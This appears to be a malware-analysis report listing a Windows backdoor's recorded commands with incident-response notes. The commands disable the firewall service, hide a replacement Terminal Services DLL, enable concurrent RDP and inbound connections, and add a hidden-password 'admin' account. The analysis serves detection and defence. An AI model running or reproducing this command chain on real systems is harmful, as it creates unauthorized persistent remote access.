Техническая информация (Technical information — process activity recorded during analysis; `<SYSTEM32>` is the report's placeholder for the Windows system directory, and the command lines below are reproduced as observed, not normalized)
- '<SYSTEM32>\attrib.exe' +H +S +R <SYSTEM32>\termsrvhack.dll
- '<SYSTEM32>\net.exe' stop sharedaccess
  Note: `SharedAccess` is the Windows Firewall / Internet Connection Sharing service. Stopping it (repeated via `net1.exe` below) removes host-firewall filtering before Remote Desktop is enabled further down; a stopped/disabled SharedAccess service on a host that is not centrally firewalled is itself worth alerting on.
- '<SYSTEM32>\reg.exe' ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\Licensing" "Core /v EnableConcurrentSessions /t REG_DWORD /d 00000001 /f
- '<SYSTEM32>\reg.exe' ADD HKLM\SYSTEM\CurrentControlSet\Services\TermService\Parameters /v ServiceDll /t REG_EXPAND_SZ /d <SYSTEM32>\termsrvhack.dll /f
  Note: the second `reg ADD` repoints the Terminal Services service DLL (`ServiceDll`) to the dropped `termsrvhack.dll`, which the first line of this report hides with `attrib +H +S +R`; the DLL is loaded the next time the service starts (`net1.exe start termservice` below). `EnableConcurrentSessions=1` together with a replaced service DLL is the usual pattern for allowing multiple simultaneous RDP sessions on a client edition of Windows. During incident response, compare this `ServiceDll` value with the stock Terminal Services DLL in the system directory (normally `termsrv.dll`) and treat any path to a non-Microsoft-signed DLL as an indicator; the odd `"` placement inside the key path is how the quoted `Terminal Server` / `Licensing Core` tokens were recorded, not a typo.
- '<SYSTEM32>\net1.exe' stop sharedaccess
- '<SYSTEM32>\net1.exe' start termservice
- '<SYSTEM32>\shutdown.exe' -a
- '<SYSTEM32>\net1.exe' start dcomlaunch
- '<SYSTEM32>\svchost.exe' -k DcomLaunch
  Note: `shutdown -a` aborts a pending system shutdown. Its position next to `net1 start dcomlaunch` suggests it is there to suppress the automatic restart Windows schedules when the RPC/DCOM-hosting `svchost` is terminated (see the `taskkill` below); this is an inference from ordering, not something the listing states.
- '<SYSTEM32>\net1.exe' user admin 7758521 /add
- '<SYSTEM32>\net1.exe' localgroup %USERNAME%s admin /add
  Note: creates a local account named `admin` with the password `7758521` and adds it to a local group. `%USERNAME%` appears to be the report's substitution for the analysis user's name, so the literal group argument was most likely `Administrators` (placeholder plus the trailing `s`) — confirm against the batch file rather than relying on the masked text. The account name and password are usable indicators; check for this user and for unexpected members of the local Administrators group.
- '<SYSTEM32>\wscript.exe' "<SYSTEM32>\3389.vbs"
- '<SYSTEM32>\cmd.exe' /c ""<SYSTEM32>\3389.bat" "
- '<SYSTEM32>\tasklist.exe' /svc
- '<SYSTEM32>\reg.exe' ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion\Winlogon /v KeepRASConnections /t REG_SZ /d 1 /f
- '<SYSTEM32>\reg.exe' ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
  Note: `fDenyTSConnections=0` enables inbound Remote Desktop connections. Combined with the stopped firewall service, the replaced service DLL, the concurrent-sessions setting and the new `admin` account, the net effect is persistent remote access over RDP; the dropped file names `3389.bat` / `3389.vbs` are consistent with the default RDP port but the listing does not show their contents.
- '<SYSTEM32>\find.exe' "TermService"
- '<SYSTEM32>\taskkill.exe' /pid 844 /f
  Note: PID 844 is specific to this analysis run and must not be used as an indicator. Together with the earlier `tasklist /svc`, the sequence is consistent with locating the `svchost` instance hosting `TermService` and force-killing it so the service reloads with the replaced `ServiceDll`; the PID is resolved at runtime, so detection should key on the `tasklist /svc` | `find "TermService"` | `taskkill /f` chain or on the registry writes above.
- <SYSTEM32>\svchost.exe
- <SYSTEM32>\3389.bat
- <SYSTEM32>\termsrvhack.dll
- <SYSTEM32>\3389.vbs
- <SYSTEM32>\termsrvhack.dll
- <SYSTEM32>\3389.vbs
- ClassName: '(null)' WindowName: '(null)'
- ClassName: 'Shell_TrayWnd' WindowName: '(null)'
- ClassName: 'EDIT' WindowName: '(null)'